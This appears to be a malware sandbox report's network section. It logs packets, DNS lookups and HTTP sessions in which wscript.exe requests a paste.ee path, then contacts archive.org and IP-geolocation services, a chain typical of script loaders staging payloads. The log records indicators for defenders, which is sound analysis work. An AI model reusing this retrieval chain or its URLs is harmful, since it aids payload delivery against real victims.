                                                                                                                                  Apr 28, 2025 13:24:36.815982103 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816054106 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816073895 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816119909 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816126108 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816158056 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816204071 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816219091 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816250086 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816266060 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816298008 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816298008 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816359043 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816375017 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816415071 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816421032 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816435099 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816453934 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816457033 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816467047 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816483021 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816514969 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816678047 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816700935 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816731930 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816739082 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816751957 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816772938 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816797018 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816817999 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816850901 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816855907 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816879988 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816880941 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816901922 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816906929 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816924095 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.816932917 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.816976070 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.817344904 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.817362070 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.817409992 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.817420959 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.817456007 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980163097 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980187893 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980249882 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980288029 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980304956 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980334044 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980350971 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980351925 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980362892 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980376959 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980405092 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980415106 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980443954 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980495930 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980516911 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980546951 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980552912 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980591059 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980679989 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980726957 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980739117 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980746031 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980763912 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980782032 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980798960 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980814934 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980820894 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.980849028 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.980990887 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981004953 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981055975 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981062889 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981076002 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981122017 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981153965 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981189966 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981195927 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981216908 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981223106 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981237888 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981273890 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981281042 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981314898 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981314898 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981360912 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981369972 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981375933 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981416941 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981432915 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981446028 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981479883 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981491089 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981499910 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981511116 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.981535912 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.981561899 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.982245922 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.982276917 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.982311010 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.982317924 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:36.982331038 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:36.982403994 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:37.141096115 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.141156912 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.141221046 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.141237020 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:37.141237020 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:37.141261101 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.141282082 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:37.141313076 CEST44349694207.241.233.30192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.141315937 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:37.141361952 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:37.141726971 CEST49694443192.168.2.6207.241.233.30
                                                                                                                                  Apr 28, 2025 13:24:37.586786985 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:37.586843014 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.586929083 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:37.587555885 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:37.587577105 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.892824888 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.892971039 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:37.894830942 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:37.894846916 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.895173073 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.896280050 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:37.940280914 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.345953941 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.345978022 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.345993996 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.346077919 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.346113920 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.346132040 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.346180916 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.346215963 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499320030 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499341965 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499434948 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499468088 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499517918 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499517918 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499531031 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499548912 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499568939 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499608040 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499614954 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499663115 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499687910 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499703884 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499748945 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499757051 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.499783993 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.499805927 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.653050900 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653074980 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653140068 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653183937 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653179884 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.653227091 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653244019 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653248072 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.653248072 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.653268099 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653291941 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.653306007 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653318882 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.653345108 CEST4434969523.186.113.60192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.653382063 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:38.653723955 CEST49695443192.168.2.623.186.113.60
                                                                                                                                  Apr 28, 2025 13:24:39.055212021 CEST4969680192.168.2.6158.101.44.242
                                                                                                                                  Apr 28, 2025 13:24:39.211507082 CEST8049696158.101.44.242192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:39.211601973 CEST4969680192.168.2.6158.101.44.242
                                                                                                                                  Apr 28, 2025 13:24:39.211945057 CEST4969680192.168.2.6158.101.44.242
                                                                                                                                  Apr 28, 2025 13:24:39.368531942 CEST8049696158.101.44.242192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:39.373764038 CEST8049696158.101.44.242192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:39.377840996 CEST4969680192.168.2.6158.101.44.242
                                                                                                                                  Apr 28, 2025 13:24:39.537199974 CEST8049696158.101.44.242192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:39.587682962 CEST4969680192.168.2.6158.101.44.242
                                                                                                                                  Apr 28, 2025 13:24:39.703388929 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:39.703459978 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:39.703557968 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:39.710938931 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:39.710963011 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:40.003057003 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:40.003118038 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:40.009085894 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:40.009119987 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:40.009407043 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:40.056463957 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:40.074361086 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:40.120271921 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:40.345695019 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:40.345771074 CEST44349697104.21.112.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:40.345841885 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:24:40.353455067 CEST49697443192.168.2.6104.21.112.1
                                                                                                                                  Apr 28, 2025 13:25:23.853566885 CEST4969180192.168.2.6192.178.49.195
                                                                                                                                  Apr 28, 2025 13:25:24.001291037 CEST8049691192.178.49.195192.168.2.6
                                                                                                                                  Apr 28, 2025 13:25:24.001415014 CEST4969180192.168.2.6192.178.49.195
                                                                                                                                  Apr 28, 2025 13:25:44.538254023 CEST8049696158.101.44.242192.168.2.6
                                                                                                                                  Apr 28, 2025 13:25:44.538324118 CEST4969680192.168.2.6158.101.44.242
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Apr 28, 2025 13:24:08.293126106 CEST5127153192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:08.433346987 CEST53512711.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:23.253813982 CEST6520353192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:23.394234896 CEST53652031.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:33.944180965 CEST5408753192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:34.084604025 CEST53540871.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:34.844441891 CEST5978353192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:35.011960983 CEST53597831.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:37.443785906 CEST6500853192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:37.585602045 CEST53650081.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:38.905477047 CEST5034453192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST53503441.1.1.1192.168.2.6
                                                                                                                                  Apr 28, 2025 13:24:39.539395094 CEST5891153192.168.2.61.1.1.1
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST53589111.1.1.1192.168.2.6

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Apr 28, 2025 13:24:08.293126106 CEST192.168.2.61.1.1.10xbfb1Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:23.253813982 CEST192.168.2.61.1.1.10x7b93Standard query (0)c.pki.googA (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:33.944180965 CEST192.168.2.61.1.1.10x8397Standard query (0)archive.orgA (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:34.844441891 CEST192.168.2.61.1.1.10x45c4Standard query (0)ia801700.us.archive.orgA (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:37.443785906 CEST192.168.2.61.1.1.10x1db1Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:38.905477047 CEST192.168.2.61.1.1.10x6c7dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.539395094 CEST192.168.2.61.1.1.10xf91eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Apr 28, 2025 13:24:08.433346987 CEST1.1.1.1192.168.2.60xbfb1No error (0)paste.ee23.186.113.60A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:22.478688955 CEST1.1.1.1192.168.2.60x8df4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:22.478688955 CEST1.1.1.1192.168.2.60x8df4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:23.394234896 CEST1.1.1.1192.168.2.60x7b93No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:23.394234896 CEST1.1.1.1192.168.2.60x7b93No error (0)pki-goog.l.google.com192.178.49.195A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:34.084604025 CEST1.1.1.1192.168.2.60x8397No error (0)archive.org207.241.224.2A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:35.011960983 CEST1.1.1.1192.168.2.60x45c4No error (0)ia801700.us.archive.org207.241.233.30A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:37.585602045 CEST1.1.1.1192.168.2.60x1db1No error (0)paste.ee23.186.113.60A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST1.1.1.1192.168.2.60x6c7dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST1.1.1.1192.168.2.60x6c7dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST1.1.1.1192.168.2.60x6c7dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST1.1.1.1192.168.2.60x6c7dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST1.1.1.1192.168.2.60x6c7dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.045752048 CEST1.1.1.1192.168.2.60x6c7dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST1.1.1.1192.168.2.60xf91eNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST1.1.1.1192.168.2.60xf91eNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST1.1.1.1192.168.2.60xf91eNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST1.1.1.1192.168.2.60xf91eNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST1.1.1.1192.168.2.60xf91eNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST1.1.1.1192.168.2.60xf91eNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                  Apr 28, 2025 13:24:39.702446938 CEST1.1.1.1192.168.2.60xf91eNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • paste.ee
                                                                                                                                  • archive.org
                                                                                                                                  • ia801700.us.archive.org
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • c.pki.goog
                                                                                                                                  • checkip.dyndns.org

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.64968523.186.113.60807148C:\Windows\System32\wscript.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Apr 28, 2025 13:24:08.595148087 CEST178OUTGET /d/fa7OMk20/0 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-ch
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                  Host: paste.ee
                                                                                                                                  Apr 28, 2025 13:24:08.747081041 CEST391INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Apr 2025 11:24:08 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 178
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Location: https://paste.ee/d/fa7OMk20/0
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                  1192.168.2.649691192.178.49.19580
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Apr 28, 2025 13:24:23.544055939 CEST200OUTGET /r/r4.crl HTTP/1.1
                                                                                                                                  Cache-Control: max-age = 3000
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: */*
                                                                                                                                  If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                  Host: c.pki.goog
                                                                                                                                  Apr 28, 2025 13:24:23.692045927 CEST1243INHTTP/1.1 200 OK
                                                                                                                                  Accept-Ranges: bytes
